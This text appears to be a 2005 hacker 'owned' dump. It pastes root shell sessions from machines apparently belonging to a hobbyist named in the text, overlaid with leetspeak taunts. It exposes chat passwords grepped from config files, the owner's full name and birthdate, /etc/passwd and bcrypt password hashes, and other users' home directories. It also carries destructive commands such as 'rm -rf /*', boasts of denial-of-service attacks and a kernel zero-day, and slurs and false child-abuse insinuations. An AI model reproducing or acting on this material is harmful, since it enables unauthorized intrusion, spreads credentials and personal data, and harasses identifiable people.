AAAAB3NzaC1yc2EAAAABIwAAAIEAsZUOeKP2MJcCCWRk0RPTF0deHRaHyAIeUs40tgEKaAX78JQuv4X97khIIq0DPUUOOvXoL5ISJtmnZtO18kcIpWXt8rEBMWxIi0yMsUIU6re9GGFZjZVRzCdaaguIaXOrHFmd8Qi5X0ZYjZBYjnGu5dpNTb3n1dwIF0CDSDoCmy0= saranac.dsl.net,209.87.64.73 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzrfKyN8lffRHYVzj9mrd7O8RR2NpIRq9wrbxwNthddu0pfR3SEQaDE8BdIlnlsqzZIA7l6uaW4+fMBNEBmlGakdyhQc+mlDyfD3E0uVdSryKcA45Dawt3XizCZt2x4wt1pGv1EomWrNyry32XRElbDaoKLyJok7GKQMzRhcHLEs= enterprise.whereistux.com,65.85.161.103 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAugeDBf11tEFv4Ug+kGbL4jBhRkzYZfGbOlRyHQKjJmO2QHGfzM2KwYRldax0fR7b+Evl5tUXeFxWHqRHj6eVC4lb0OGQA/chaq/tpYmnjfR3VRdEpx7ciUdrIxl3l3727vNm9T649BBowGqWUkYyplvlVy03yc5er33i7L2TtTc= owlmanatt.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAugeDBf11tEFv4Ug+kGbL4jBhRkzYZfGbOlRyHQKjJmO2QHGfzM2KwYRldax0fR7b+Evl5tUXeFxWHqRHj6eVC4lb0OGQA/chaq/tpYmnjfR3VRdEpx7ciUdrIxl3l3727vNm9T649BBowGqWUkYyplvlVy03yc5er33i7L2TtTc= cybitures.com,64.20.39.18 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAxYgPdmrZUlhZj2Ca9SQF6BmD5f/Wzo2IHUN9BJZ0oZBnl1QX9XLaGqGIMb5A5+fGZ7vcBlERbVM6SxL9/3vm2pvnca2Eyg74El9pimynjPHMAj5yLzT4zLBt5Am/8OJCTO17PIinJQLI4p+tzJC8bzGdxHeQl1mRJ2Q5IovTKw8= infinityb.canada-pwns.info,205.206.186.244 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA3IuH0rqYJ/8zj1rfFk21E4g89Ylo2sd7Cho1+iUhUCZW/o/IDt6aEPagsOphn1vgFct/FJSspEnVl70gulacEPVU03a/lrquB1y1j5GgdaqDIxX8w+Lz0x+xEJ6eGQ0nSstGlbyJ7hdc2xeJWuR/1aV+x76I+As0F5/g6KBgHZ0= kato,172.16.1.36 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6NPiNFALclfFIRA3AUFepAGcUTpqV7uE2ZQwG98z1i3a6Jwmvj8+aAwOM8GxzZyD3YqSkkatrHeimADVeflmJuWtI7+z0MAou+CsoNnBPnOZJ7LST45nLfwVDehwPNZPf2xiZWcgLvakCaKW2lETzh/nLLTXArN5SoLcYLksMds= whereistux.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAugeDBf11tEFv4Ug+kGbL4jBhRkzYZfGbOlRyHQKjJmO2QHGfzM2KwYRldax0fR7b+Evl5tUXeFxWHqRHj6eVC4lb0OGQA/chaq/tpYmnjfR3VRdEpx7ciUdrIxl3l3727vNm9T649BBowGqWUkYyplvlVy03yc5er33i7L2TtTc= ns1.whereistux.com,65.85.161.99 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEArDgzPUy7bAptTTvSg9NkhfFgaP4JGmo0Mw28hn2Nmznf17JJSYOTOpIDbP49NNT5aR6INBGng8KkAwu/uSggG5Ty9IuJBC5UUPYgSUQWgieFie/+eJCcFvxVDjD78rZ8xvQyYjAhWQw+q2BbIc3j8TQto2y8w1slx9XIGYzT8yE= owly.homelinux.net,64.252.174.211 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6NPiNFALclfFIRA3AUFepAGcUTpqV7uE2ZQwG98z1i3a6Jwmvj8+aAwOM8GxzZyD3YqSkkatrHeimADVeflmJuWtI7+z0MAou+CsoNnBPnOZJ7LST45nLfwVDehwPNZPf2xiZWcgLvakCaKW2lETzh/nLLTXArN5SoLcYLksMds= |1|F+ouHUhEUg3+NtTAQdjO7NLaxXk=|wmhtbCYcfbK/lI8wCtoiVuKmJvg= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAti1/6OTdGmZ2ta5Qdjegj2XJOaQnOd0tg68rbci8mj4YiA9PrChik/SXmpJamKOneaG78DmyR3MWhul6w+s3M1gHbzzXCBM5W+EN7VfpdrHMF8PSM+cryAKXpnsUXKyvCqrSVn1Yc7chSLFbS8eXvrembzoUc5Xu9ebHiVKg2U8= |1|hC9rQgnhAfLcmM+d5GAV82z+5oY=|jfzmtKo+jFJZ1MHyvOApmmbADyo= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAti1/6OTdGmZ2ta5Qdjegj2XJOaQnOd0tg68rbci8mj4YiA9PrChik/SXmpJamKOneaG78DmyR3MWhul6w+s3M1gHbzzXCBM5W+EN7VfpdrHMF8PSM+cryAKXpnsUXKyvCqrSVn1Yc7chSLFbS8eXvrembzoUc5Xu9ebHiVKg2U8= |1|T1nDjQyDPep5YFX26sanGI6phZM=|gaCwh0pUc1WOr0z6xxnEEjEcWHE= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAw1Ge23DFbrCQpHhL8tFpcvF1guMjlDE//hxiWzOSMstd8gX/K583WVsA1K6bXH6UMoq7kZUD/BA1/okeNb+EUWdZM6T+5I0Hx70ig2CF1Lg5IJhQkb/UdUX/eXEVdPJRF7dBEEFehNxtxjPislHj3iK999yFBE3+E0PzZlT0lKM= |1|YCyIfoZnqgqMdKczlZT826SUDXw=|JW+fGwiiKcnGTMCKHATNYnzDwvk= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAw1Ge23DFbrCQpHhL8tFpcvF1guMjlDE//hxiWzOSMstd8gX/K583WVsA1K6bXH6UMoq7kZUD/BA1/okeNb+EUWdZM6T+5I0Hx70ig2CF1Lg5IJhQkb/UdUX/eXEVdPJRF7dBEEFehNxtxjPislHj3iK999yFBE3+E0PzZlT0lKM= |1|ghyfQff8/TSN7iqa3VOQXMI8ApQ=|Z1bL8vArg0ZTXJY6YVUB/pIA/Mo= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6NPiNFALclfFIRA3AUFepAGcUTpqV7uE2ZQwG98z1i3a6Jwmvj8+aAwOM8GxzZyD3YqSkkatrHeimADVeflmJuWtI7+z0MAou+CsoNnBPnOZJ7LST45nLfwVDehwPNZPf2xiZWcgLvakCaKW2lETzh/nLLTXArN5SoLcYLksMds= bell ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA590smJCAKTEDv7apvthabDd0FocMFr48QiRV4CsNJHHtbzCMINStGK1urOtoU/uHhUNKb4ImZPZqrafbtYwZfSvvM9ePKoAfOaHibgKZjCGwcVuVq1l+/h8JPfw5CV2aoMhzxLXCR6LQMCrHiAwx1+LQtoFe8WPRt1JLB+yaG9c= owlmanatt@bell:/home/owlmanatt$ cat perl/test.pl <--- L3TZ S33 WH4T K1ND 0F 0HD4Y H3 HAZ #!/usr/bin/perl #Weird, random script. print "What is the message you wish to print?\n"; chomp($mess = ); print "How many times to print it?"; chomp($times = ); if(! $mess) { print "Fool! Enter a message!\n"; } else { if ($times <= 0) { print "Llama, put in a REAL number!\n"; } else { $mess .= "\n"; print $mess x $times; } } owlmanatt@bell:/home/owlmanatt$ cat perl/n00b.pl #!/usr/bin/perl print "Hello, World!\n"; print "ls"; ^ --- 0H FUq B4TM4N H3 W1LL T4KE 0V3R TH3 W0RLD W1TH C0D3 LIK3 D1S owlmanatt@bell:/home/owlmanatt$ cd stuff owlmanatt@bell:/home/owlmanatt/stuff$ cat stupid.txt iji iji iji iji iji iji jtiji iji iji iji iji iji ij iji iji iji iji iji ijjDMNQti iji iji iji iji iji ij iji iji iji iji iji cXMNMNMNQjiji iji iji iji iji ij iji iji iji iji ijcSMNMNMNMNHJiji iji iji iji iji ij iji iji iji iji iSWMNMNMNMHJi iji iji iji iji iji ij iji iji iji iji6WMNMNMNMNYiji iji Jci iji iji iji ij iji iji iji i5WMNMNMNMN5iji iji JHMNSciji iji iji ij iji iji iji5NMNMNMNMW5iji iji JHMNMNMWSji iji iji ij iji iji ijcXMNMNMNMNNYiji ijtKMNMNMNMNMW6 iji iji ij iji iji iji jDMNMNMN.-----------.MNMNMNMNMW5i iji ij iji itciji iji QWEEW| Trollkore |NMQWMNMNMNMN5iji ij ijitKMWSiji iji jQMN|- - - - - -|QtijSWMNMNMNMNYi ij itQMNMNMW6iji iji tK| The *new* |tii icSMNMNMNMNHJij iJHMNMNMNMW6iji ijcS| regime! |iji ijicXMNMNMNN5ij ijiYNMNMNMNMN5i iSWM'___________' ciji ijicDMNW6i ij iji i5NMNMNMNMNSWMNMMNMNHNMNMNMNMNXciji iji5i iji ij iji iji5WMNMNMNMNMMNMNN5ij5NMNMNMNMNScjji iji iji ij iji iji i6WMNMNMMNMNW5iji ij6WMNMNMNMWSji iji iji ij iji iji ijiSWMMNMNW6iji iji tKMNMNMNMNXci iji iji ij iji iji iji cSMNWSiji iji tQMNMNMNMNDjiji iji iji ij iji iji ij iji c6ciji iji QMNMNMNMNQi iji iji iji ij iji iji iji iji iji ijjDMNMNMNMNQtiji iji iji iji ij iji iji iji iji iji ijXMNMNMNMNKt iji iji iji iji ij iji iji iji iji iji jQMNMNMNHJiji iji iji iji iji ij iji iji iji iji iji iji tKMNHJiji iji iji iji iji ij iji iji iji iji iji iji tYiji iji iji iji iji iji ij ^ --- H0LLY SH1T 0WLNAZ1!^@$!^@$ owlmanatt@bell:/home/owlmanatt/stuff$ cd .. owlmanatt@bell:/home/owlmanatt$ ls php/nixsec <--- N1XS3C TH0S3 F4GG0TZ SUQ%#^$ layout.html layout.html~ style.css style.css~ owlmanatt@bell:/home/owlmanatt$ ls kato aim config jabber msn xchatlogs owlmanatt@bell:/home/owlmanatt$ cd docs owlmanatt@bell:/home/owlmanatt/docs$ cd .. owlmanatt@bell:/home/owlmanatt$ cd classified <-- TH1Z MUZT B3 M0R3 CH1LD P0RN. Y0U S1Q FUQ owlmanatt@bell:/home/owlmanatt/classified$ ls files artofshellcode.txt ctorn.htm google.txt packets.txt rootkits.txt weaklogins.txt attackplanning.txt dos.htm ha-howto.html pgp.txt sam.txt win32asm.txt basiccrypto.txt dos.txt hidetracks-win2k.txt pgpencryption.htm server.txt win32bo.txt bof-forkidz.txt ebook-C.zip iis4.txt php.txt shellaccounts.txt wingate.txt box ebook-Perl5.zip ipspoofing.txt prepare_to_attack.doc smashingthestack.txt winrpc.txt bufferow.txt exploitscripts.txt linux.txt pythonprog.htm unixpw.txt c.txt forgeemail.txt monitordiff.txt readshcode.txt usesofroot.txt ^--- H4CK3R T3XTF1L3Z. W4TCH 0UT W0RLD, H3R3 0WL C0M3Z!!!!! owlmanatt@bell:/home/owlmanatt/classified$ ls eclog DEBIAN log.tar.gz owlmanatt@bell:/home/owlmanatt/classified$ ls logs AIM IRC MSN YAHOO aim jabber msn oldlog system ^--- D1DNT 3V3N N33D T0 SN1FF TH1Z B0X H0H0H0H0 owlmanatt@bell:/home/owlmanatt/classified$ cd ../.gaim owlmanatt@bell:/home/owlmanatt/.gaim$ ls accels accounts.xml accounts.xml~ blist.xml blist.xml~ icons logs pounces.xml prefs.xml smileys status.xml owlmanatt@bell:/home/owlmanatt/.gaim$ grep "pass" accounts* accounts.xml: owldsl accounts.xml: owltpo accounts.xml: owldsl accounts.xml: owldsl accounts.xml: owltpo accounts.xml: owltpo accounts.xml: owlowl accounts.xml: owltpo accounts.xml: owltpo accounts.xml: owltpo accounts.xml~: owltpo accounts.xml~: owltpo accounts.xml~: owltpo accounts.xml~: owltpo owlmanatt@bell:/home/owlmanatt/.gaim$ grep "user" accounts* accounts.xml: <vCard prodid='-//HandGen//NONSGML vGen v1.0//EN' version='2.0' xmlns='vcard-temp'><FN>Nicholas Evans</FN><NICKNAME>OwlManAtt</NICKNAME><URL>http://owlmanatt.com</URL><ADR><REGION>New England</REGION><COUNTRY>US of A</COUNTRY></ADR><EMAIL>OwlManAtt@OwlManAtt.com</EMAIL><BDAY>1989.12.20</BDAY></vCard> owlmanatt@bell:/home/owlmanatt/.gaim$ cd .. WH0 1Z 0N TH1Z L4M3 SKUMB4G'Z B0X? owlmanatt@bell:/home/owlmanatt/.gaim$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh postfix:x:100:103::/var/spool/postfix:/bin/false syslog:x:105:105::/home/syslog:/bin/false klog:x:106:106::/home/klog:/bin/false owlmanatt:x:1000:1000:Nicholas Evans,,,:/home/owlmanatt:/bin/bash messagebus:x:101:110::/var/run/dbus:/bin/false cupsys:x:102:107::/:/bin/false fetchmail:x:103:65534::/var/run/fetchmail:/bin/sh hal:x:111:111:Hardware abstraction layer,,,:/var/run/hal:/bin/false saned:x:113:113::/home/saned:/bin/false gdm:x:104:114:Gnome Display Manager:/var/lib/gdm:/bin/false sshd:x:107:65534::/var/run/sshd:/bin/false steve:x:1001:100::/home/steve:/bin/bash debian-tor:x:115:115::/var/lib/tor:/bin/bash cvsd:x:108:116:cvs pserver daemon:/var/lib/cvsd:/bin/false dhcp:x:117:117::/nonexistent:/bin/false hplip:x:109:7:HPLIP system user,,,:/var/run/hplip:/bin/false owlmanatt@bell:/home/owlmanatt/.ssh$ sudo su sudo: pam_authenticate: Module is unknown owlmanatt@bell:/home/owlmanatt/.gaim$ cd .. owlmanatt@bell:/home/owlmanatt$ cat hello.c #define NAME hello.c #define DESCRIP many languages at once (tcl, perl 4 & 5, sh, C) #define AUTHOR ****** ******** #define DATE 7/31/96 #define dummy \ eval qq[qq? 2> /dev/null #if 0 #\ echo 'Hello world!'; exit 0 # shell part puts "Hello world!"; exit 0 #endif /* C part */ #include int main(void) { printf ("Hello world!\n"); return 0; } #define dummy2(perl) \ ?]; print "Hello world!\n"; exit 0 # perl part fuck1ng l33t Last login: Sat Oct 22 20:59:52 2005 from bell OpenBSD 3.7 (GENERIC) #431: Sun Mar 20 14:10:02 MST 2005 ========================================= = _____ ___ ____ ____ _____ ____ ____ = =|_ _|_ _/ ___| _ \| ____/ ___/ ___| = = | | | | | _| |_) | _| \___ \___ \ = = | | | | |_| | _ <| |___ ___) |__) |= = |_| |___\____|_| \_\_____|____/____/ = ========================================= ========================================= === RULES (4ND L4CK TH3R3 0F) === ========================================= * No child pornography. ^ ----w3 f0unD pl3nTy 0f Th1z!! * No haxx0ring/f0rkb0mbs/lameness. * That fucking means you, uber. ^ ---- w3 4ll Kn0w n13th3r yu0 0r y0ur Fr13ndz h4xx0r * No bandwidth/CPU whoring. ^ --- s0rrY ab0u7 th@ T1M3 W3 Dd0z3d 3fn3t :( * Don't get the fucking hostmask banned on EFNet. ^ ---- kn0wFx yu0 fUck1ng Suq! ^- h0no has quit (klined) * Refrain from unauthorized port scanning. ^ --- nmap fbi.gov; cat /dev/urandom|telnet fbi.gov 80 * Respect other people's code, databases, and projects. ^ ---- # rm -rf /* * NO MOTHERFUCKING EMO SPACESHIPS. ^ -- Wh4t th3 fUq@@!@ * Do not abuse tor. ^ ---- t0r 1z f0r h1pp13z * Canal and NukuNuku do not have to follow these rules. ^ --- 4n4l FuKK4 wh4t th3 FuQ!#@ IF YOU DO SOMETHING FUCKING LAME, I CANNOT BE HELD RESPONSIBLE. THIS SERVICE COMES WITHOUT FUCKING GUARANTEES. I WILL CUT YOU SHIT OFF IF I FEEL LIKE IT, AND HAVE NO LEGAL RESPONSIBILITY TO GIVE YOU ANY SORT OF GODDAMNED COMPENSATION. ^ --- t00 b4d y0u fuqn l4m3r. h0no d3m4ndz 0d4y t4x!@#$ --- g1v3 up y0ur 0d4yz!@# n0w!@#!@#!@#! # uname -a;id OpenBSD tigress.gateway.2wire.net 3.7 GENERIC#431 sparc64 ------- 0p3nbsD 1z n0 m4tCh f0r h0noz 0hd4y k3rn3l bUgZ h3h3 uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) # ls -al /home/* /home/mfqr: total 22644 drwxr-xr-x 5 mfqr mfqr 512 Nov 11 20:28 . drwxr-xr-x 4 root wheel 512 Oct 29 21:47 .. lrwxr-xr-x 1 mfqr mfqr 9 Oct 30 03:03 .bash_history -> /dev/null -rw-r--r-- 1 mfqr mfqr 179 Oct 30 03:03 .bash_login -rw------- 1 mfqr mfqr 5108 Nov 11 20:28 .viminfo -rw-r--r-- 1 mfqr mfqr 17 Oct 29 21:47 .vimrc -rw-r--r-- 1 mfqr mfqr 54 Nov 11 20:27 blib.pm drwxr-xr-x 3 mfqr mfqr 512 Oct 29 22:00 echoghost -rw-r--r-- 1 mfqr mfqr 11 Oct 29 22:03 mfqr drwx------ 7 500 500 1024 Oct 30 05:38 silc-client-1.0.2 -rwx------ 1 root mfqr 11540480 Apr 6 2005 silc-client-1.0.2.tar drwxrwxrwx 6 mfqr mfqr 1024 Oct 30 04:48 silklol -rw-r--r-- 1 mfqr mfqr 68 Nov 11 20:28 test.pl /home/owlmanatt: total 36 drwxr-xr-x 3 owlmanatt owlmanatt 512 Nov 26 14:26 . drwxr-xr-x 4 root wheel 512 Oct 29 21:47 .. -rw------- 1 owlmanatt owlmanatt 1852 Nov 26 14:51 .bash_history -rw-r--r-- 1 owlmanatt owlmanatt 195 Oct 22 21:27 .bash_login -rw------- 1 owlmanatt owlmanatt 4767 Oct 23 17:48 .viminfo -rw-r--r-- 1 owlmanatt owlmanatt 17 Oct 22 21:31 .vimrc drwxr-xr-x 2 owlmanatt owlmanatt 512 Jan 19 2003 dnet # grep -v '*' /etc/master.passwd root:$2a$08$3UzrCUGu/VbJb170f67aYuujaOXjG..YRG9a7jzEI1b/FyCRchG7a:0:0:daemon:0:0:Charlie &:/root:/bin/csh owlmanatt:$2a$06$X0i41Tkrz6Z5hgyJbrf1.ecYPtpAFfQJGVKigV9db3bCG.RcsIVLu:1000:1000::0:0:Nicholas Evans:/home/owlmanatt:/usr/local/bin/bash mfqr:$2a$06$Rn3ciKRc5KTLK4N/UjO.LuYk/0JG10bEQhGCD3l06mfUGoqXEUCbW:1001:1001::0:0:Vile:/home/mfqr:/usr/local/bin/bash Th1Z b0X h4z n0th1nG. 0n t0 th3 n3x7 0n3%#$%## owlmanatt@bell:/home/owlmanatt$ ssh kato Linux kato 2.6.12-10-386 #1 Fri Nov 18 11:51:02 UTC 2005 i686 GNU/Linux ============================== == _ __ _ _____ ___ == == | |/ / / \|_ _/ _ \ == == | ' / / _ \ | || | | | == == | . \ / ___ \| || |_| | == == |_|\_\/_/ \_\_| \___/ == ============================== == RULES == ============================== * No child pornography. ^-~-~-~ /home/owlmanatt/secret/ * No haxx0ring/f0rkb0mbs/lameness. * That fucking means you, uber. ^-~-~-~ ./h0no-0bsd-3xpl0i7 -h openbsd.org * No bandwidth/CPU whoring. ^-~-~-~ th1z b0x 1z undd0z4bl3 juz7 7ry 1T *h0no has quit (ping timeout)* * Don't get the fucking hostmask banned on EFNet. ^-~-~-~ alr3adY d1d :/ * Refrain from unauthorized port scanning. ^-~-~-~ nmap 5up3r fuq1n s3cr3t pl4c3 * Respect other people's code, databases, and projects. ^-~-~-~ rm -rf /home/* * NO MOTHERFUCKING EMO SPACESHIPS. ^-~-~-~ 3y3 st1ll d0 n0t kn0w wh4t th1z 1z * Do not abuse tor. ^-~-~-~ t0r 1z n0t 0n th1z b0x f00l. * Canal and NukuNuku do not have to follow these rules. ^-~-~-~ m0re 4n4l fUq1nG!@?!@? IF YOU DO SOMETHING FUCKING LAME, I CANNOT BE HELD RESPONSIBLE. THIS SERVICE COMES WITHOUT FUCKING GUARANTEES. I WILL CUT YOU SHIT OFF IF I FEEL LIKE IT, AND HAVE NO LEGAL RESPONSIBILITY TO GIVE YOU ANY SORT OF GODDAMNED COMPENSATION. ^-~-~-~ b1g t0ugh 0wlm4n t4lk1ng b1g#@$%!* Last update: 2005-10-08 13:44 Have fun. You have new mail. Last login: Thu Dec 1 09:08:07 2005 from bell owlmanatt@kato:~$ uname -a Linux kato 2.6.12-10-386 #1 Fri Nov 18 11:51:02 UTC 2005 i686 GNU/Linux ThanKZ SD!@@ owlmanatt@kato:~$ id uid=1000(owlmanatt) gid=1000(owlmanatt) groups=109(admin),1000(owlmanatt),1004(webdev),1005(webdev-adm) owlmanatt@kato:~$ sudo su Password: root@kato:/home/owlmanatt # id uid=0(root) gid=0(root) groups=0(root) root@kato:/home/owlmanatt # ls -al /home/ total 3043628 drwxr-xr-x 10 root root 4096 2005-11-24 10:28 . drwxr-xr-x 21 root root 4096 2005-11-24 14:17 .. -rw-r--r-- 1 root root 3113538985 2005-11-24 10:47 complete-backup_20051124102800.tar.gz drwxr-xr-x 3 ell1sk ell1sk 4096 2005-08-17 02:25 ell1sk drwx--x--x 5 fac51 fac51 4096 2005-11-19 13:30 fac51 drwx--x--x 11 infinityb infinityb 4096 2005-11-16 18:37 infinityb drwxr-xr-x 2 root root 49152 2005-08-16 16:22 lost+found drwx--x--x 21 owlmanatt owlmanatt 4096 2005-11-29 22:43 owlmanatt drw------- 5 owlmanatt staff 4096 2005-10-26 17:17 pasv drwx--x--x 4 trevor trevor 4096 2005-09-05 15:27 trevor drwx--x--x 17 uberuser uberuser 4096 2005-11-26 03:27 uberuser ^ --- 4ll th3z3 fuckz ar3 l0z3rz root@kato:/home/owlmanatt # ls -al /home/owlmanatt /home/owlmanatt: total 3032 drwx--x--x 21 owlmanatt owlmanatt 4096 2005-11-29 22:43 . drwxr-xr-x 10 root root 4096 2005-11-24 10:28 .. -rw-r--r-- 1 owlmanatt owlmanatt 18436 2005-09-21 18:44 2005-09-17_lab-procedure.abw -rw-r--r-- 1 owlmanatt owlmanatt 44 2005-10-30 21:49 AI.php -rw------- 1 root root 6442 2005-11-22 06:27 .bash_history -rw-r--r-- 1 owlmanatt owlmanatt 414 2005-08-16 16:32 .bash_profile -rw-r--r-- 1 owlmanatt owlmanatt 2114 2005-09-26 23:21 .bashrc drwxr-xr-x 2 owlmanatt owlmanatt 4096 2005-11-19 23:49 book_parse -rw-r--r-- 1 owlmanatt owlmanatt 8 2005-10-09 18:25 breifcase.combo drwxr-xr-x 3 root root 4096 2005-08-22 15:43 .cpan -rw------- 1 root root 61 2005-11-21 22:20 .cvspass -rw-r--r-- 1 owlmanatt owlmanatt 2324955 2005-11-24 10:24 database_backup.sql -rw-r--r-- 1 owlmanatt owlmanatt 479 2005-09-18 10:56 db.owlmanatt drwxr-xr-x 3 owlmanatt owlmanatt 4096 2005-11-26 13:52 dnet drwx------ 2 owlmanatt owlmanatt 4096 2005-10-19 00:05 .elinks drwxr-xr-x 2 owlmanatt owlmanatt 4096 2005-10-02 12:37 gparse drwxr-xr-x 2 owlmanatt owlmanatt 4096 2005-11-23 19:43 horde_tar -rwx------ 1 owlmanatt owlmanatt 121 2005-09-17 09:29 ipcheck.bsh -rw-r--r-- 1 owlmanatt owlmanatt 33 2005-11-11 12:59 ipcheck.dat -rw-r--r-- 1 owlmanatt owlmanatt 52 2005-09-10 22:59 ipcheck.err -rw-r--r-- 1 owlmanatt owlmanatt 18 2005-11-11 12:59 ipcheck.html -rw-r--r-- 1 owlmanatt owlmanatt 835 2005-12-01 17:00 ipcheck.log -rwxr-xr-x 1 owlmanatt owlmanatt 171842 2005-08-14 23:03 ipcheck.py drwx------ 2 owlmanatt owlmanatt 4096 2005-11-24 18:30 .irssi -rw-r--r-- 1 owlmanatt owlmanatt 391982 2005-11-12 16:32 mindwar.abw -rw------- 1 root root 162 2005-08-16 22:31 .mysql_history drwx------ 3 owlmanatt owlmanatt 4096 2005-08-17 21:54 .naimlog drwxr-xr-x 4 owlmanatt owlmanatt 4096 2005-09-13 21:47 nuku -rw-r--r-- 1 owlmanatt owlmanatt 1697 2005-09-05 18:22 NukuNukuP_1125958924.tar.bz2 drwxr-xr-x 4 owlmanatt owlmanatt 4096 2005-08-22 20:07 OwlInfo -rw-r--r-- 1 root root 59 2005-08-18 20:22 .pearrc drwxr-xr-x 4 owlmanatt owlmanatt 4096 2005-10-29 10:54 project_docs drwxr-xr-x 19 owlmanatt owlmanatt 4096 2005-11-20 08:40 public_html drwxr-xr-x 2 owlmanatt owlmanatt 4096 2005-11-18 22:04 ruby_2005-11-18 -rw-r--r-- 1 owlmanatt owlmanatt 165 2005-08-18 08:13 .screenrc -rw-r--r-- 1 owlmanatt owlmanatt 46 2005-11-25 13:44 songs.txt drwx------ 2 owlmanatt owlmanatt 4096 2005-10-14 15:09 .ssh drwxr-xr-x 3 owlmanatt owlmanatt 4096 2005-08-22 20:03 .subversion drwxr-xr-x 2 owlmanatt owlmanatt 4096 2005-10-26 17:46 sysadmin_scripts drwxr-xr-x 2 owlmanatt owlmanatt 4096 2005-11-24 23:24 tmp drwxr-xr-x 3 owlmanatt owlmanatt 4096 2005-10-21 21:41 tmpdit -rw------- 1 owlmanatt owlmanatt 9757 2005-11-29 22:43 .viminfo -rw-r--r-- 1 owlmanatt owlmanatt 43 2005-11-18 20:34 .vimrc -rw-r--r-- 1 owlmanatt owlmanatt 105 2005-12-01 17:00 webip.out drwxr-xr-x 2 owlmanatt owlmanatt 4096 2005-11-24 23:26 yasashii root@kato:/home # cd fac51 root@kato:/home/fac51 # cd irclogs/ root@kato:/home/fac51/irclogs # ls -al total 16 drwxr-xr-x 4 fac51 fac51 4096 2005-10-09 14:18 . drwx--x--x 5 fac51 fac51 4096 2005-11-19 13:30 .. drwxr-xr-x 2 fac51 fac51 4096 2005-11-29 15:18 DogicDesign drwxr-xr-x 2 fac51 fac51 4096 2005-11-19 13:49 EFNet ^--- n0 n33d t0 sn1ff h0h0 root@kato:/home/fac51/irclogs # cd /home/pasv root@kato:/home/pasv # cat test.c #include #include int main (int argc, char **argv) { FILE *fp; char *file; if((fp=fopen("/home/pasv/.m", "w+")) =< 0) { perror("fopen"); exit(1); } file = memset(malloc(1000),0,1000); <--- 0h fuCk m4ll0c!@!@? y0u w1ll b3 th3 n3xt Scut w1f th3s3 sk1llz } root@kato:/home/pasv # cd .. root@kato:/home # cd uberuser root@kato:/home/uberuser # ls ASKUBIE AskUbie Intelligent IRC Bot.doc dictionary likelog.log realnames.txt version.list AskUbie IRC bot (objects, classes, layout).doc dictionary.bkp masters.list responses.log botnicks.list doc nicks.list The Askubie IRC bot PLAN.doc Channel.pm greetings.txt PSUEDO_CODE topic.list compliments.txt insults.txt Quotes urls.list ^--- 0H SH1T!@# W4TCH 0UT F0R 4SKUB13!@#$%!!@ root@kato:/home/uberuser # ls public_html/misc/NIXSEC/* public_html/misc/NIXSEC/code: backdoor cisco-leaked exploit other practice security shellcode ^ --- H4H4H4 WH3N W1LL TH3Z3 L0Z3RZ G3T 0V3R N1XS3C?#@ --- 1T W4Z 0WN3D 4ND SK3W 1Z 1N H1D1NG@#$* SHUT TH3 FUQ UP 4B0UT N1XS3C public_html/misc/NIXSEC/papers: coding other security unix root@kato:/home/uberuser # ls public_html/misc/NIXSEC/cisco-leaked/ ls: public_html/misc/NIXSEC/cisco-leaked/: No such file or directory ^--- 0BV10UZLY TH3Y D0NT H4V3 SH1T root@kato:/home/uberuser # cd public_html/misc/NIXSEC root@kato:/home/uberuser/public_html/misc/NIXSEC # ls code papers ^--- N0 C0D3 root@kato:/home/uberuser/public_html/misc/NIXSEC # cd code/cisco-leaked root@kato:/home/uberuser/public_html/misc/NIXSEC/code/cisco-leaked # ls root@kato:/home/uberuser/public_html/misc/NIXSEC/code/cisco-leaked # cd .. root@kato:/home/uberuser/public_html/misc/NIXSEC/code # ls * backdoor: cisco-leaked: - wh4t w0uld y0u d0 w1th 1t 4nyw4y? t3ll p3opl3 yu0 h4v3 1t t0 s0und l33t? exploit: - n0th1ng ju5t az 3xp3ct3d... other: practice: bof challenges fmtstring heap symlink security: - 4h4h4h4h4 n1xs3c? s3cur1Ty?!@?!@ shellcode: - th3s3 l4m3rs d0nt kn0w ay ess em! root@kato:/home/uberuser/public_html/misc/NIXSEC/code # cd .. root@kato:/home/uberuser/public_html/misc/NIXSEC # ls code papers root@kato:/home/uberuser/public_html/misc/NIXSEC # ls papers/* papers/coding: papers/other: papers/security: papers/unix: root@kato:/home/uberuser/public_html/misc/NIXSEC # cd .. root@kato:/home/uberuser/public_html/misc # cd .. root@kato:/home/uberuser/public_html # cd ../.. root@kato:/home # cd uberuser root@kato:/home/uberuser # cat kkkfile /| / | / | / \ / | / \ /______ | _ _ _ /|@/@ \_\__\ \ \\ ///<__ / \ \\ \_ // \\_\|/ \___\\_ \ ______ // __/\__/ / \_ /'-.____\____||/ \/ \_ | <|/\_\\ \ \ \ \ _/ \\_\-\ | \ / \ \__ | ___/ \/_____/| \ \_| | \ / | | 